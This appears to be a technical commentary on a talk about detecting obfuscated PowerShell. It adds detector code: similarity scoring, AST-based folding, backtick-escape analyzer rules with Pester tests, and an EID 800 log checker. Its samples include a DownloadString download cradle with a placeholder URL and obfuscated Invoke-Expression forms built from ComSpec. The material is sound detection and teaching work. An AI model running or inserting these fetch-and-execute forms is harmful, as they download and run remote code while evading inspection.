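# Samples to score: one plain command and two obfuscation styles shown in the deck (constructed text).
$samples = [ordered]@{
    'plain cradle'      = '(New-Object Net.WebClient).DownloadString("https://example.invalid/a.ps1")'
    'tick/index (s.59)' = '. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'''' )'
    'symbolic (s.23)'   = '${-''*}=+$( ); ${ }= ${-''*} ; ${(+} =++ ${-''*};${)}=(${-''*}=${-''*}+${(+} ) ; ${''/}= (${-''*} =${-''*}+ ${(+} );'
}
foreach ($name in $samples.Keys) {
    $score = Get-CosineSimilarity -A (Get-CharFrequencyVector -Text $samples[$name]) -B $baseline
    [PSCustomObject]@{ Sample = $name; Similarity = [math]::Round($score, 3) }
}
```

Run as a script and it prints one row per sample. Against a letter-heavy baseline the symbolic sample, which is almost entirely `${}()+=;` characters, scores far below the plain command, which is the signal slide 31 illustrates; the deck's point on slides 34 and 40 is that this single measure has poor recall (0.37), which is why Revoke-Obfuscation moved to a trained model over many AST features.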
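Slides 36 and 37 show the token stream and AST for `Get-Command -Name ("{1}{0}" -f "-Process","Get")`. The script below is an added example, not from the talk: it parses that line with the PowerShell parser, lists the token kinds and AST node types, and statically folds a format-operator expression whose operands are all string constants back to the command name it hides (here `Get-Process`) without executing anything. That constant-only restriction is the point for a detection engineer: the AST lets you recover what the obfuscation resolves to while refusing to evaluate anything non-literal. All function names are my own.

```powershell
# Added example (not from the talk): tokens, AST nodes and static folding of a constant -f expression.
using namespace System.Management.Automation.Language

function Get-ParsedScript {
    # Parse text with the real PowerShell parser; returns the tokens and the ScriptBlockAst.
    param([Parameter(Mandatory)][string]$ScriptText)
    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)
    if ($errors.Count) { throw "Parse errors: $($errors.Message -join '; ')" }
    [PSCustomObject]@{ Ast = $ast; Tokens = $tokens }
}

function Get-TokenKinds {
    # Token kinds in source order (Generic, Parameter, LParen, StringExpandable, Format, ...).
    param([Parameter(Mandatory)][string]$ScriptText)
    (Get-ParsedScript $ScriptText).Tokens |
        Where-Object { $_.Kind -ne [TokenKind]::EndOfInput } |
        ForEach-Object { $_.Kind.ToString() }
}

function Get-AstOutline {
    # Every AST node with its nesting depth: the tree drawn on slide 37.
    param([Parameter(Mandatory)][string]$ScriptText)
    (Get-ParsedScript $ScriptText).Ast.FindAll({ $true }, $true) | ForEach-Object {
        $depth = 0; $p = $_.Parent
        while ($p) { $depth++; $p = $p.Parent }
        [PSCustomObject]@{ Depth = $depth; Type = $_.GetType().Name; Text = $_.Extent.Text }
    }
}

function Resolve-ConstantFormatExpression {
    # Finds BinaryExpressionAst nodes whose operator is -f and whose operands are all string
    # constants, and evaluates only those. Anything with a non-literal operand is left alone,
    # so no attacker-controlled code is ever run.
    param([Parameter(Mandatory)][string]$ScriptText)
    $ast = (Get-ParsedScript $ScriptText).Ast
    $ast.FindAll({ param($n) $n -is [BinaryExpressionAst] -and $n.Operator -eq [TokenKind]::Format }, $true) |
        ForEach-Object {
            $node = $_
            if ($node.Left -isnot [StringConstantExpressionAst]) { return }
            $right = $node.Right
            if ($right -is [StringConstantExpressionAst]) {
                $operands = @($right.Value)
            } elseif ($right -is [ArrayLiteralAst] -and
                      @($right.Elements | Where-Object { $_ -isnot [StringConstantExpressionAst] }).Count -eq 0) {
                $operands = @($right.Elements | ForEach-Object { $_.Value })
            } else {
                return   # an operand is not a literal: report nothing rather than evaluate it
            }
            [PSCustomObject]@{ Obfuscated = $node.Extent.Text; Resolved = ($node.Left.Value -f $operands) }
        }
}

$sample = 'Get-Command -Name ("{1}{0}" -f "-Process","Get")'   # the deck's example (slide 36)
(Get-TokenKinds $sample) -join ', '
Get-AstOutline $sample | Format-Table Depth, Type, Text -AutoSize
Resolve-ConstantFormatExpression $sample
```

The double-quoted `"{1}{0}"` is tokenised as StringExpandable but, because it contains no `$`, the parser emits a StringConstantExpressionAst for it, which is why the slide's AST lists constants under the BinaryExpressionAst and why the folding step can treat it as a literal.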
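Slides 38 and 39 describe logistic regression trained by stochastic gradient descent in words. Written out with the deck's own names (Bias, Weight_i, F_i, Result, ExpectedResult), as an added derivation rather than content from the slides:

$$
z = \text{Bias} + \sum_{i} \text{Weight}_i \cdot F_i, \qquad
\text{Result} = \sigma(z) = \frac{1}{1 + e^{-z}}
$$

The sum $z$ is the "Linear Regression" part of slide 38; pushing it through $\sigma$, the inverse of the logit function $\log\frac{p}{1-p}$, is what makes it logistic regression, so Result is a probability that the script is obfuscated. For one labeled sample with $\text{ExpectedResult} = y \in \{0, 1\}$ and the cross-entropy loss

$$
L = -\bigl[\, y \log \text{Result} + (1 - y) \log (1 - \text{Result}) \,\bigr],
$$

the derivatives simplify, because $\sigma'(z) = \sigma(z)(1 - \sigma(z))$, to

$$
\frac{\partial L}{\partial \text{Weight}_i} = (\text{Result} - \text{ExpectedResult}) \cdot F_i = \text{Error} \cdot F_i,
\qquad
\frac{\partial L}{\partial \text{Bias}} = \text{Error}.
$$

This is slide 39's "adjust each weight according to how much it contributed to the error": a feature that was large when the prediction was wrong gets the largest correction. With learning rate $\eta$ one SGD step is

$$
\text{Weight}_i \leftarrow \text{Weight}_i - \eta \cdot \text{Error} \cdot F_i, \qquad
\text{Bias} \leftarrow \text{Bias} - \eta \cdot \text{Error},
$$

applied sample by sample across the labeled corpus and repeated for several passes ("do this a lot").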
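Slides 49 to 50 and 52 to 67 describe token-targeted PSScriptAnalyzer rules (Measure-TickUsageInMember, Measure-TickUsageInVariable and the rest of the listed module) that catch minimal obfuscation the character-level approach misses. The module below is an added example written for this page, not the PesterSec code from the talk; its rule names are my own and deliberately differ from the deck's. It assumes PowerShell 5.1 or later for the parser classes, that PSScriptAnalyzer builds its DiagnosticRecord from the Message, Extent, RuleName and Severity properties of whatever objects a custom rule emits (so plain PSCustomObjects suffice and the file also runs with PSScriptAnalyzer absent), and Pester 4 syntax for the tests at the end. The samples are constructed after slides 53 and 59 with a placeholder URL.

```powershell
# Added example (not the talk's PesterSec module): two PSScriptAnalyzer-style rules that flag
# backtick escapes inside member names and variable names, a small driver, and Pester tests.
using namespace System.Management.Automation.Language

function New-ObfuscationDiagnostic {
    # Assumption: PSScriptAnalyzer reads these four properties from any object a custom rule
    # returns, so a PSCustomObject is enough for the rules to load via -CustomRulePath.
    param([string]$Message, [IScriptExtent]$Extent, [string]$RuleName)
    [PSCustomObject]@{ Message = $Message; Extent = $Extent; RuleName = $RuleName; Severity = 'Warning' }
}

function Measure-BacktickInMemberName {
    # Flags $obj."Do`wn`load`String"(...) style members. InvokeMemberExpressionAst derives from
    # MemberExpressionAst, so one FindAll covers property access and method invocation. The parser
    # has already resolved the escapes: Member.Value is the real name, Member.Extent.Text the source.
    [CmdletBinding()]
    param([Parameter(Mandatory)][ScriptBlockAst]$ScriptBlockAst)
    $ScriptBlockAst.FindAll({ param($n)
        $n -is [MemberExpressionAst] -and $n.Member.Extent.Text.Contains('`') }, $true) |
    ForEach-Object {
        $resolved = if ($_.Member -is [StringConstantExpressionAst]) { $_.Member.Value } else { $_.Member.Extent.Text }
        New-ObfuscationDiagnostic -RuleName 'BacktickInMemberName' -Extent $_.Member.Extent `
            -Message ("Member name {0} uses backtick escapes; resolves to '{1}'" -f $_.Member.Extent.Text, $resolved)
    }
}

function Measure-BacktickInVariableName {
    # Flags ${e`Nv:c`oM`sPEC}-style variables: the braced syntax accepts backtick escapes that
    # hand-written scripts never need. VariablePath.UserPath is the name the parser resolved.
    [CmdletBinding()]
    param([Parameter(Mandatory)][ScriptBlockAst]$ScriptBlockAst)
    $ScriptBlockAst.FindAll({ param($n)
        $n -is [VariableExpressionAst] -and $n.Extent.Text.Contains('`') }, $true) |
    ForEach-Object {
        New-ObfuscationDiagnostic -RuleName 'BacktickInVariableName' -Extent $_.Extent `
            -Message ("Variable {0} uses backtick escapes; resolves to '{1}'" -f $_.Extent.Text, $_.VariablePath.UserPath)
    }
}

function Find-BacktickObfuscation {
    # Driver usable without PSScriptAnalyzer: parse the text, run both rules, return the hits.
    param([Parameter(Mandatory)][string]$ScriptText)
    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)
    @(Measure-BacktickInMemberName -ScriptBlockAst $ast) + @(Measure-BacktickInVariableName -ScriptBlockAst $ast)
}

# Pester tests (Pester 4 syntax; with Pester 5 move the definitions above into a BeforeAll block).
# Samples are constructed after slides 53 and 59; the URL is a placeholder.
Describe 'Backtick obfuscation rules' {
    It 'flags a backtick-escaped member name and reports the real name' {
        $hits = @(Find-BacktickObfuscation '(New-Object Net.WebClient)."Do`wn`load`Str`in`g"(''https://example.invalid/a.ps1'')')
        $hits.Count | Should -Be 1
        $hits[0].RuleName | Should -Be 'BacktickInMemberName'
        $hits[0].Message | Should -Match "resolves to 'DownloadString'"
    }
    It 'flags a backtick-escaped variable name' {
        $hits = @(Find-BacktickObfuscation '. ( ${e`Nv:c`oM`sPEC}[4,15,25] -join '''' )')
        $hits.Count | Should -Be 1
        $hits[0].RuleName | Should -Be 'BacktickInVariableName'
        $hits[0].Message | Should -Match "resolves to 'eNv:coMsPEC'"
    }
    It 'is silent on the unobfuscated forms' {
        $hits = @(Find-BacktickObfuscation '(New-Object Net.WebClient).DownloadString("https://example.invalid/a.ps1"); $env:ComSpec')
        $hits.Count | Should -Be 0
    }
}
```

Save the rule functions as a .psm1 and they can be run over a script with `Invoke-ScriptAnalyzer -Path <script> -CustomRulePath <module>`; the Pester block is the regression test that keeps each rule honest as new samples arrive. Both rules share the design the deck argues for: they inspect one AST node type and compare what the parser resolved against what the source text looked like, so a single backtick in a member or variable name is enough to fire, with no dependence on overall character statistics.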
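Slides 72 to 75 make one point about Windows PowerShell module logging (EID 800): however the invocation is spelled on the command line (Invoke-Expression, iex, ie`x, or the runtime-built form on slide 75), the Details section names the cmdlet that was actually bound, CommandInvocation(Invoke-Expression). The script below is an added example, not from the talk, that turns that observation into a check: for each CommandInvocation in an event it asks whether the cmdlet's name, or one of its aliases as known on the analysing host, occurs literally in the recorded CommandLine, and reports the invocation as obfuscated when none does. The four event bodies are constructed from the slides' text with the <REDACTED> fields collapsed; the function names are my own.

```powershell
# Added example (not from the talk): spot obfuscated cmdlet invocations in EID 800 events by
# comparing the bound cmdlet (Details) against what the command line literally contains.

function Get-AcceptedSpellings {
    # The cmdlet's own name plus its aliases on this host (iex for Invoke-Expression by default).
    # Assumption: the analysing host's aliases match those of the logging host.
    param([Parameter(Mandatory)][string]$CmdletName)
    @($CmdletName) + @(Get-Alias -Definition $CmdletName -ErrorAction SilentlyContinue | ForEach-Object { $_.Name })
}

function Test-Eid800Invocation {
    # Returns one record per CommandInvocation(...) in the event, with Obfuscated = $true when
    # neither the cmdlet name nor any alias occurs as a whole word in the CommandLine field.
    param([Parameter(Mandatory)][string]$EventMessage)
    $cmdLine = [regex]::Match($EventMessage, '(?m)^\s*CommandLine=(.*)$').Groups[1].Value.Trim()
    $invoked = [regex]::Matches($EventMessage, 'CommandInvocation\(([^)]+)\)') |
        ForEach-Object { $_.Groups[1].Value } | Select-Object -Unique
    foreach ($name in $invoked) {
        $seen = Get-AcceptedSpellings $name | Where-Object {
            $cmdLine -match ('(?<![\w-])' + [regex]::Escape($_) + '(?![\w-])')   # -match is case-insensitive
        }
        [PSCustomObject]@{
            Cmdlet      = $name
            SeenAs      = ($seen -join ',')
            Obfuscated  = (@($seen).Count -eq 0)
            CommandLine = $cmdLine
        }
    }
}

# Constructed EID 800 bodies following the slides (72: cmdlet, 73: alias, 74: tick, 75: built at runtime).
$commandLines = @(
    'Invoke-Expression $env:gkwa',
    'iex $env:gkwa',
    'ie`x $env:gkwa',
    'sV s3zxl5 ( [typE]( "{1}{0}{2}" -f''ViRO'',''en'',''NmeNt'') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f ''V'',''geten'',''e'',''iRONmeNTv'',''ARIAbL'' ).Invoke( ''gkwa'',( "{2}{1}{0}" -f ''S'',''ocES'',''pR'' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'''' )'
)
$events = foreach ($cl in $commandLines) {
@"
Pipeline execution details for command line: $cl

Context Information:
    DetailSequence=1
    <REDACTED>
    CommandLine=$cl

Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
"@
}

$events | ForEach-Object { Test-Eid800Invocation -EventMessage $_ } |
    Format-Table Cmdlet, SeenAs, Obfuscated, CommandLine -AutoSize
```

The first two events come back with SeenAs set (`Invoke-Expression` and `iex`) and Obfuscated false; the tick-escaped and runtime-built forms come back with nothing seen and Obfuscated true, which is the same verdict the OBFUSCATED! callouts give on slides 74 and 75. The check needs no signature for any particular obfuscation style: it only relies on the log recording the canonical cmdlet name after PowerShell has resolved it.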